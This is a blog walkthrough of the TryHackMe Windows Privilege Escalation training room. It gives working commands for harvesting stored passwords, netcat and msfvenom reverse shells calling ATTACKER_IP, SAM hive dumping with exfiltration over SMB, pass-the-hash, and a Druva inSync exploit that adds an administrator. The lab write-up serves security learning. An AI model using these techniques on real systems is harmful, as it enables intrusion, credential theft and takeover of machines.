TryHackMe: Windows Privilege Escalation - Walkthrough

November 28, 2024
November 28, 2024 Jasper

It is time to look at the Windows Privilege Escalation Room on TryHackMe, a medium level room in which we learn how to escalate our privileges on Windows machine. I don’t know about you but I am looking forward to this one. I have historically been stronger on looking at Linux machine, so there is a bunch to learn.

Windows Privilege Escalation
Windows Privilege Escalation

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM.

Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Box URL: https://tryhackme.com/r/room/windowsprivesc20


Task 1: Introduction

During a penetration test, you will often have access to some Windows hosts with an unprivileged user. Unprivileged users will hold limited access, including their files and folders only, and have no means to perform administrative tasks on the host, preventing you from having complete control over your target.

This room covers fundamental techniques that attackers can use to elevate privileges in a Windows environment, allowing you to use any initial unprivileged foothold on a host to escalate to an administrator account, where possible.

If you want to brush up on your skills first, you can have a look through the Windows Fundamentals Module or the Hacking Windows Module.

Answer: No answer needed


Task 2: Windows Privilege Escalation

Some quick theory here. Let’s get these questions answered and move on.

Users that can change system configurations are part of which group?

Answer: Administrators

The SYSTEM account has more privileges than the Administrator user (aye/nay)

The system account has full access to all files and resources available on the host with even higher privileges than administrators.

Answer: aye


Task 3: Harvesting Passwords from Usual Spots

The main point to learn in this tasks is that there are plenty of places to look for passwords on a Windows system. Examples covered here are Unattended Installation config files, Powershell History, saved Windows credentials, IIS configuration files, and saved credentials from software such as PuTTY. Let’s move on.

A password for the julia.jones user has been left on the Powershell history. What is the password?

To read the Powershell history we enter the following command:

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Reading Powershell history

There on line 6 we find her password.

Answer: ZuperCkretPa5z

A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?

According to the task, there are two possible locations where we can find these web.config files:

  • C:\inetpub\wwwroot\web.config
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

The first one does not exist on the system, but if we run the command with the second location we find a connectionString:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
Reading a web.config file

To be exact, we find this, including the password:

<add connectionString=”Server=thm-db.local;Database=thm-sekure;User ID=db_admin;Password=098n0x35skjD3″ name=”THM-DB” />

Answer: 098n0x35skjD3

There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.

The instructions tell use exactly what to do. Start with cmdkey to see for which users we have saved credentials:

cmdkey /list
Finding saved credentials

Sure enough, we have a saved credential for mike.

Now run the following command to run cmd with his credentials:

runas /savecred /user:mike.katz cmd.exe
Running cmd.exe with saved credentials

There we go. Now find the flag on mike.katz’s Desktop:

Found the flag

Answer: THM{WHAT_IS_MY_PASSWORD}

Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?

This one is also literally described in the task. Run the following command to search under the following registry key for ProxyPassword:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Retrieving the password in the saved PuTTY session

Cool pass, indeed!

Answer: CoolPass2021


Task 4: Other Quick Wins

This task is all about abusing Task Scheduler tasks that have been configured to run an executable file that we can change to run a netcat reverse shell.

What is the taskusr1 flag?

Let’s start by getting info on the scheduled task called “vulntask”.

schtasks /query /tn vulntask /fo list /v
Finding info on the vulntask task

As discussed in the task description, we can edit the file if have the correct permissions. To check these we run the following command:

icacls c:\tasks\schtask.bat
We have the correct permissions

Now all we need to do is echo the nc64 command to the schtask.bat file to overwrite its content. Remember to change the ip.

echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

And setup a listener on your attacker machine:

nc -lvnp 4444

Finally, run the scheduled task with:

schtasks /run /tn vulntask
Running the scheduled task

And yes, we got a connection:

We got a connection

And find the flag:

Another flag in the house

Answer: THM{TASK_COMPLETED}


Task 5: Abusing Service Misconfigurations

This part covers three different service misconfigurations, and each vulnerability has a question related to it.

Get the flag on svcusr1’s desktop.

Once again, we can follow the steps from the covered theory:

sc qc WindowsScheduler
Printing info on the scheduled task

The binary path is mentioned. Now we check the permissions:

icacls C:\PROGRA~2\SYSTEM~1\WService.exe
Checking our permissions again

The Everyone group has modify permissions (M) on the service’s executable. This means we can simply overwrite it with any payload of our preference, and the service will execute it with the privileges of the configured user account.

Now we need to fulfil the following tasks:

  1. Create a reverse shell payload:
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
  2. Setup a Python web server:
    python3 -m http.server
First two steps

3. Get the binary from the attacker machine into the target
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe

4. On the target machine, rename the original binary, move the payload to its location and give the right permissions (making sure you are using Powershell):

cd C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1> move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

Replacing the WService.exe binary

5. On your attacker machine, setup a reverse listener:
nc -lvnp 4445

6. On the target machine, startup the task:
sc stop windowsscheduler
sc start windowsscheduler

7. Startup a listener and receiving a shell:

Receiving a shell

And there we can the flag:

Finding another flag

Answer: THM{AT_YOUR_SERVICE}

Get the flag on svcusr2’s desktop.

Now it is time to abuse Unquoted Service Paths. The process is quite similar. We place a binary in a place that gets called due to a Task Scheduler task not correctly specifying its BINARY_PATH:NAME (not using double quotes), causing our payload to be called instead. Again , we need to build a payload with msfvenom, download it from our attacker machine, setup a listener, and start the scheduled task.

The problem is with the following task:

sc qc "disk sorter enterprise"
Printing scheduled task info, again

If we check the permissions on the binary file location we can see that we have writing privileges:

icacls c:\MyPrograms
Reading our permissions, again again

There we can do as follows on our machine:

# Create payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe

# Setup a server
python3 -m http.server

Then we download the file on our target machine:

wget http://ATTACKER_IP:8000/rev-svc2.exe -O rev-svc2.exe

Setup a listener on our attacker machine:

# Setup listener
nc -lvp 4446

Move the file and give it permissions:

move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
Moving the file and giving permissions

And start and stop the task:

sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"
Restarting the task

And we got a reverse shell:

Receiving a reverse shell again

As before, find the flag on svcusr2’s desktop located at C:\Users\svcusr2\Desktop.

Reading another flag

Answer: THM{QUOTES_EVERYWHERE}

Get the flag on the Administrator’s desktop.

You know the drill by now. It is very similar to the last two questions:

  1. Create a payload:
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe 
  2. Start a server:
    python3 -m http.server
  3. Start a listener:
    nc -lvp 4447
  4. Download the file from Powershell:
    wget http://10.10.121.104:8000/rev-svc3.exe -o rev-svc3.exe

5. Grant permissions:
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F

6. In your cmd configure the binPath:
sc config THMService binPath= “C:\Users\thm-unpriv\rev-svc3.exe” obj= LocalSystem

7. Stop, and start the service:
sc stop THMService
sc start THMService

You should have received a reverse shell:

Receiving a shell

Now find the flag on the administrator’s desktop:

Reading the flag

Answer: THM{INSECURE_SVC_CONFIG}


Task 6: Abusing dangerous privileges

Get the flag on the Administrator’s desktop.

In this task, we can decide between three different methods: SeBackup / SeRestore, SeTakeOwnership, SeImpersonate / SeAssignPrimaryToken. I will pick the Backup route as it seems to involve of a few techniques I find great to learn.

RDP into the target machine, for example by using Remmina on your AttackBox. When logged in you can go ahead and run a command prompt as administrator.

You should now be able to see your privileges with the command:

whoami /priv
Checking our privileges

Bypass traverse checking allows to backup SAM and SYSTEM hashes with the following commands:

reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

Make sure the backups are in the directory:

Checking if the backup hive files are saved

Now we need to get it over to your AttackBox. We can do by using SMB. We can use impacket’s smbserver.py to start a simple SMB server with a network share in the current directory of our AttackBox.

Run the following commands:

mkdir share
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

Tip: I had problems with impacket warning me that the address already was in use. In this case run the following commands and try again:

sudo lsof -i :445
# If this command shows a process using port 445 (the default SMB port), note its PID.
sudo kill -9 <PID>

Now run the following commands to copy the backups to your attacker machine.

copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\

We can now use impacket to retrieve the users’ password hashes:

cd share
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
Dumping password hashes with impacket

Finally, we can do a Pass-the-Hash attack by passing the Administrator hash in the following command (please use the correct hash if it does not fit your results):

python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@10.10.1.125
Using a Pass-the-hash attack

Now we only need to find the flag on the Administrator’s Desktop:

There we go!

Another flag..

Answer: THM{SEFLAGPRIVILEGE}


Task 7: Abusing vulnerable software

The final practical task to complete in this room, and it’s a short one. Let’s go. We are in the endgame now.

Get the flag on the Administrator’s desktop.

The theory mentions the following exploit:

$ErrorActionPreference = "Stop"

$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

All we need to do is run this exploit on the target machine in a Powershell console.

The exploit will create user pwnd with a password of SimplePass123 and add it to the administrators’ group. If the exploit was successful, we should be able to run the following command to verify that the user exists and is part of the administrators’ group:

net user pwnd
Using the net command to check our permissions

This is the case. Now we can run a command prompt as administrator. When prompted for credentials, use the pwnd account.

Opening CMD with pwnd user initials

From the new command prompt, you can retrieve your flag from the Administrator’s desktop with the following command:

type C:\Users\Administrator\Desktop\flag.txt
Reading the final flag, I promise

There we have it 🙂

Answer: THM{EZ_DLL_PROXY_4ME}


Congratulations, we are done! Tasks 8 and 9 do not have any assignments so we will not cover those.

It was great to learn some Windows Privilege Escalations techniques and I hope you learned at least as much as I did.

See you next time. Happy hacking!


Like my articles?

You are welcome to give my article a clap or two 🙂
I would be even more grateful if you support me by buying me a cup of coffee:

Buy me a coffee

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

Leave a Reply

Your email address will not be published. Required fields are marked *